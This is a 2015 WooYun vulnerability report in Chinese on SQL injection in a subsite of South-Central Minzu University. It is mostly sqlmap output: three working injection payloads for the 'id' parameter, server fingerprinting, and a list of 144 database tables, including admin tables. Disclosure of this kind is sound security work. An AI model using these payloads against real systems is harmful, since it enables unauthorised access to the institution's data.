漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0152574
漏洞标题:中南民族大学某分站存在SQL注入
相关厂商:CCERT教育网应急响应组
漏洞作者: 龍 、
提交时间:2015-11-09 14:26
修复时间:2015-11-22 11:18
公开时间:2015-11-22 11:18
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=184 AND 9426=9426
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=184 AND (SELECT 7771 FROM(SELECT COUNT(*),CONCAT(0x7173636d71,(S
ELECT (CASE WHEN (7771=7771) THEN 1 ELSE 0 END)),0x716e617071,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: id=-2694 UNION ALL SELECT NULL,CONCAT(0x7173636d71,0x4b447362455959
464a75,0x716e617071),NULL,NULL,NULL,NULL,NULL#
---
[14:13:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] smkx
漏洞证明:
Database: smkx
[144 tables]
+---------------------------+
| option |
| admin |
| any_admin |
| any_attachment |
| any_categories |
| any_essay |
| any_log |
| any_role |
| any_user |
| g110 |
| genliuyan |
| ggao |
| guanli |
| haic |
| ip |
| ip_allow |
| js |
| jshu |
| md_smkx_admin888 |
| md_smkx_link |
| md_smkx_news |
| md_smkx_newscata |
| md_smkx_sigle |
| mdhy_admin888 |
| mdhy_link |
| mdhy_news |
| mdhy_newscata |
| mdhy_sigle |
| mdhy_temp |
| mdhy_vote |
| mdsky_admin888 |
| mdsky_book |
| mdsky_link |
| mdsky_news |
| mdsky_newscata |
| mdsky_newsold |
| new_class |
| phome_ecms_infoclass_news |
| phome_ecms_infotmp_news |
| phome_ecms_news |
| phome_ecms_newsutf8 |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqtemp |
| phome_enewsbuybak |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgroup |
| phome_enewsinfoclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslog |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewsplwords |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewssearch |
| phome_enewssearchtemp |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewstable |
| phome_enewstempvar |
| phome_enewsuser |
| phome_enewsvote |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| title |
| tpzt |
| wenjian |
| wlssys_admin888 |
| wlssys_book |
| wlssys_gustbook |
| wlssys_link |
| wlssys_news |
| wlssys_newscata |
| wlssys_newsold |
| xbswx_classdeclarecontent |
| xbswx_declarecate |
| xbswx_judge |
| xbswx_onlineuser |
| xbswx_select |
| xbswx_settings |
| xbswx_sitearticle |
| xbswx_sitebook |
| xbswx_sitecategory |
| xbswx_sitecourse |
| xbswx_sitefriendlink |
| xbswx_sitemodule |
| xbswx_statistic |
| xbswx_systemaction |
| xbswx_systemuser |
| xbswx_teacher |
| xbswx_video |
| xbswx_votes |
| xbswx_votetoplic |
| xdyqx_classdeclarecontent |
| xdyqx_declarecate |
| xdyqx_onlineuser |
| xdyqx_settings |
| xdyqx_sitearticle |
| xdyqx_sitebook |
| xdyqx_sitecategory |
| xdyqx_sitecourse |
| xdyqx_sitefriendlink |
| xdyqx_sitemodule |
| xdyqx_statistic |
| xdyqx_systemaction |
| xdyqx_systemuser |
| xdyqx_teacher |
| xdyqx_video |
| xdyqx_votes |
| xdyqx_votetoplic |
| xinxi |
| zhuye |
| ztlm |
+---------------------------+
修复方案:
版权声明:转载请注明来源 龍 、@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-22 11:18
厂商回复:
最新状态:
暂无